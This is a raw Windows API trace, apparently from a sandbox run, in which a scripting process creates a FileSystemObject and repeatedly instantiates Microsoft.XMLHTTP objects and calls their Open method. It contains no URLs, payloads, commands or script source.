	[0275.324] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0275.324] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0275.324] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0275.324] SysStringLen (param_1=0x0) returned 0x0
	[0275.324] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0275.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0275.328] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0275.328] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0275.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0275.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0275.328] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0276.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0276.299] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0276.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0276.300] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0276.301] SysStringLen (param_1=0x0) returned 0x0
	[0276.301] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0276.301] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0276.301] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c30) returned 0x0
	[0276.301] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0276.301] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0276.301] ??2@YAPEAX_K@Z () returned 0x62f330
	[0276.301] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0276.301] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0276.301] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0276.301] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c30) returned 0x0
	[0276.301] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c30) returned 0x3
	[0276.301] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0276.301] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0276.304] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0276.304] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0276.304] SysStringLen (param_1=0x0) returned 0x0
	[0276.304] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0276.304] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0276.304] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0276.304] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0276.304] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7538) returned 0x0
	[0276.304] ??2@YAPEAX_K@Z () returned 0x62f310
	[0276.304] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7538, pUnkSite=0x62f310) 
	[0276.304] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0276.304] XMLHTTPRequest:IUnknown:Release (This=0x49c7538) returned 0x0
	[0276.304] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0276.304] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0276.305] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0276.305] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0276.305] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0276.305] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0276.305] SysStringLen (param_1=0x0) returned 0x0
	[0276.305] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0276.305] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0276.305] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0276.305] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0276.305] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0276.305] ??2@YAPEAX_K@Z () returned 0x62f330
	[0276.305] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0276.305] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0276.305] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0276.305] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0276.305] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0276.305] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0276.305] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0276.306] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0276.306] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0276.306] SysStringLen (param_1=0x0) returned 0x0
	[0276.306] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0276.306] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0276.306] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0276.306] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0276.306] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0276.306] ??2@YAPEAX_K@Z () returned 0x62f310
	[0276.306] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f310) 
	[0276.306] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0276.306] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0276.306] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0276.306] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0276.306] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0276.306] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0276.306] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0276.307] longjmp () 
	[0276.307] longjmp () 
	[0276.307] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0276.307] SysStringLen (param_1=0x0) returned 0x0
	[0276.307] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0276.307] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0276.307] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0276.307] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0276.307] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5be8) returned 0x0
	[0276.307] ??2@YAPEAX_K@Z () returned 0x62f330
	[0276.307] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5be8, pUnkSite=0x62f330) 
	[0276.307] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0276.307] XMLHTTPRequest:IUnknown:Release (This=0x49c5be8) returned 0x0
	[0276.307] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0276.307] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0276.307] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0276.307] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0276.310] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0276.310] longjmp () 
	[0276.310] longjmp () 
	[0276.310] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0276.310] SysStringLen (param_1=0x0) returned 0x0
	[0276.310] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0276.310] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
